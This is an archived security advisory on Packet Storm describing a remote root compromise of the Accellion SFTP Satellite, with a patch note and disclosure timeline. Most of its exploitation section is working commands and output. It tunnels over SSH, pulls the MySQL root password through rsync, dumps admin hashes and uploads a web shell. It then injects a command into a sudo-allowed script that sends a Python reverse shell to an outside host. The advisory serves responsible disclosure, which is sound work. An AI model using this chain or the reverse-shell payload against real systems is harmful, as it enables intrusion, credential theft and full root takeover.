what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Accellion Secure File Transfer Code Execution

Accellion Secure File Transfer Code Execution
Posted May 27, 2014
Authored by Thomas Hibbert | Site security-assessment.com

The Accellion Secure File Transfer SFTP Satellite ships with SSH tunneling enabled. An authorized SFTP user can connect to the SFTP satellite and leverage the SSH tunneling functionality to attack localhost bound ports that are not intended to be exposed externally. By leveraging trust assumptions in the running Rsync daemon, sensitive files including the MySQL root password are retrievable. This password can be used when connecting to the MySQL database, also running on localhost, and the password hashes of all users configured on the server can be retrieved. Accellion released a software update to version FTA_9_8_70 on the 4th of December 2013 which disables SSH tunneling and prevents this issue being exploited.

tags | exploit, root
SHA-256 | 68bc250d8823491080a18930f81edf603898e7a112a41ce582d30e72238a43bb

Accellion Secure File Transfer Code Execution

Change Mirror Download
  (    , )     (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_='`"``=.

presents..

Accellion Secure File Transfer SFTP Satellite Remote Root Code Execution
PDF: http://www.security-assessment.com/files/documents/advisory/Accellion%20SFTP%20Satellite%20Remote%20Root%20Code%20Exec.pdf

+-----------+
|Description|
+-----------+

The Accellion Secure File Transfer SFTP Satellite ships with SSH tunneling enabled.
An authorized SFTP user can connect to the SFTP satellite and leverage the SSH tunneling
functionality to attack localhost bound ports that are not intended to be exposed
externally. By leveraging trust assumptions in the running Rsync daemon, sensitive
files including the MySQL root password are retrievable. This password can be used when
connecting to the MySQL database, also running on localhost, and the password hashes of
all users configured on the server can be retrieved.

The Rsync daemon can also be used to upload files to the Accellion server’s web root,
leading to arbitrary code execution. Due to a number of serious misconfigurations on
the server, it is easy to escalate privilege to root once this has been achieved.

+------------+
|Exploitation|
+------------+

First stage exploitation is acheived by using ssh with the -N option (no shell or command
executed) and -D (dynamic port forward).

root@kali:~# ssh test2@192.168.1.112 -N -D 8888
test2@192.168.1.112's password:
^Z
[2]+ Stopped ssh test2@192.168.1.112 -N -D 8888
root@kali:~# bg
ssh test2@192.168.1.112 -N -D 8888 &

At this point it is possible to retreive files from the Accellion system using the "kennel"
Rsync module. As the connection is coming from the localhost address, it is trusted.

root@kali:~/accellion# proxychains rsync —list -only -var 127.0.0.1::kennel 2>&1 | head -10
P
roxyChains-3.1 (http://proxychains.sf.net)
|S-chain| -<>-127.0.0.1:8888 -<><>-127.0.0.1:873-<><>-OK
receiving incremental file list
drwxrwxrwx 4096 2013/05/08 00:17:17 .
rsync: opendir "/admin" (in kennel) failed: Permission denied (13)

drwx------ 4096 2013/07/23 03:26:43 admin

-rw-r--r-- 4096 2013/12/01 23:08:59 filexl
-rw-r--r-- 10 2013/12/01 22:32:25
filexl/db

-rw-r--r-- 4110 2013/05/08 02:04:58 filexl/mboxl_l000.sql.gz

-rw-r--r-- 1331 2013/12/01 23:11:44 filexl/sftpusers.tar

The file “filex1/db” contains the MySQL password for the root user in clear text.
root@kali:~/accellion# proxychains rsync -var 127.0.0.1::kennel/filex1/db .
P
roxyChains-3.1 (http://proxychains.sf.net)
|S-chain| -<>-127.0.0.1:8888 -<><>-127.0.0.1:873-<><>-OK
receiving incremental file list

sent 28 bytes received 54 bytes 164.00 bytes/sec
total size is 10 speedup is 0.12
root@kali:~/accellion# cat db; echo
GwkL4Neee

root@kali:~/accellion# proxychains mysql -u root -p --protocol=tcp
P
roxyChains-3.1 (http://proxychains.sf.net)
|S-chain| -<>-127.0.0.1:8888 -<><>-127.0.0.1:3306-<><>-OK
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 320
Server version: 4.0.15-standard

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select c_username, c_password from t_admin;
+------------+------------------------------------------+
| c_username | c_password |
+------------+------------------------------------------+
| superuser | 382365d5464811e9cdeea16c627e42866aa8fe27 |
+------------+------------------------------------------+
1 row in set (0.00 sec)

Using the Rsync daemon, upload a web shell:

root@kali:~/accellion# proxychains rsync -avr ../brick.php 127.0.0.1::/kennel/seos/courier
P
roxyChains-3.1 (http://proxychains.sf.net)
|S-chain| -<>-127.0.0.1:8888 -<><>-127.0.0.1:3306-<><>-OK
sending incremental file list

sent 30 bytes received 8 bytes 76.00 bytes/sec
total size is 355 speedup is 9.34

This can now be used to execute arbitrary code on the server.

The “nobody” account is present in the /etc/sudoers file with the NOPASSWD directive. This
is extremely poor security practice and demonstrates a fundamental lack of understanding
of UNIX security principles.

The “nobody” user is permitted to execute the /usr/local/bin/ssl.pl script as root without
a password. This script was found to be vulnerable to command injection as follows:

elsif *$opt_u) {
`cp $FILE $FILE.$bkup_date`;
`mv $opt_u $FILE`;
`chmod 400 $FILE`;
}

The $opt_u variable is controllable by user input and is not validated. Executing the
following command with an uploaded web shell will cause a reverse TCP shell to be sent
to 192.168.1.1 running as root:

sudo /usr/local/bin/ssl.pl -c -u '/tmp/bla /tmp/bla ;python -c "import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(
(\"192.168.1.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])"; echo'

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.1.112: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.112] 51663
sh: no job control in this shell
sh-32# id
uid=0(root) gid=0(root) groups=0*root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


+--------+
|Solution|
+--------+

Accellion released a software update to version FTA_9_8_70 on the 4th of December 2013 which
disables SSH tunneling and prevents this issue being exploited. All Accellion customers are
encouraged to update if they have not already done so.

+-------------------+
|Disclosure Timeline|
+-------------------+

29-11-2013 Vulnerability discovered and reported to vendor through customer channel. Email to
security@accellion.com bounces.

03-12-2013 Vulnerability disclosed to vendor via security@accellion.com

04-12-2013 Vendor issues patch version 9_8_70 resolving the issue

26-05-2014 Public release of advisory.

+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+

Security-Assessment.com is a leading team of Information Security consultants specialising
in providing high quality Information Security services to clients throughout the Asia
Pacific region. Our clients include some of the largest globally recognised companies
in areas such as finance, telecommunications, broadcasting, legal and government. Our aim
is to provide the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development, and its team
continues to identify and responsibly publish vulnerabilities in public and private software
vendor's products. Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:
Web www.security-assessment.com
Email info@security-assessment.com
Phone +64 4 460 2596
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close